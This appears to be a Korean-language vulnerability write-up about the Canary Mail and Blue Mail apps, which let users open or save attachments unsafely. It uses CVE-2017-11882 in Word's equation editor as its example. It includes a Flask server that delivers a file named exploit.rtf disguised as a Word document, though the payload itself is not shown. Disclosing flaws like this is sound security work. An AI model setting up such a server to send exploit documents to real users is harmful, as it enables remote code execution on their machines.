
Canary Mail 또는 Blue mail 사용 시 안전하지 않은 첨부 파일 처리
핵심 문제는 사용자가 악성 첨부 파일을 여는 것이 아니라, Canary Mail이나 Blue Mail과 같은 앱이 첨부 파일을 저장하거나 여는 데 편리하면서도 안전하지 않은 기능을 제공한다는 점입니다. 저는 이를 사용자를 공격자에게 노출시키는 보안 취약점으로 간주합니다.
"연결 프로그램(Open with)" 또는 "다른 이름으로 저장(Save as)" 대화 상자를 통해 Office Word 첨부 파일을 안전하지 않게 여는 것을 입증하기 위해, Office Word 16 이하의 수식 편집기에 존재하는 CVE-2017-11882 취약점이 사용되었습니다.
from flask import Flask, send_file, request
import logging
from datetime import datetime
app = Flask(__name__)
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
@app.before_request
def log_request_info():
logger.info(f'Request: {request.method} {request.url} from {request.remote_addr}')
@app.after_request
def log_response_info(response):
logger.info(f'Response: Status {response.status_code} for {request.url}')
return response
@app.route('/download')
def download_file():
try:
response = send_file('exploit.rtf', mimetype='application/msword', as_attachment=True)
logger.info('File download successful')
return response
except FileNotFoundError:
logger.error('File exploit.rtf not found')
return 'File not found', 404
if __name__ == '__main__':
app.run(debug=False, host='0.0.0.0', port=5000)
오래된 Microsoft Office Word 소프트웨어 버전 16 이하를 사용하는 사용자에게 발생할 수 있는 잠재적 RCE
https://github.com/user-attachments/assets/fc99d603-f56f-451b-a9f2-821422feef61
https://github.com/user-attachments/assets/68b638b9-e906-4c78-baae-84a369f807f3
이 저장소는 교육 및 방어적 보안 연구 목적으로만 제공됩니다.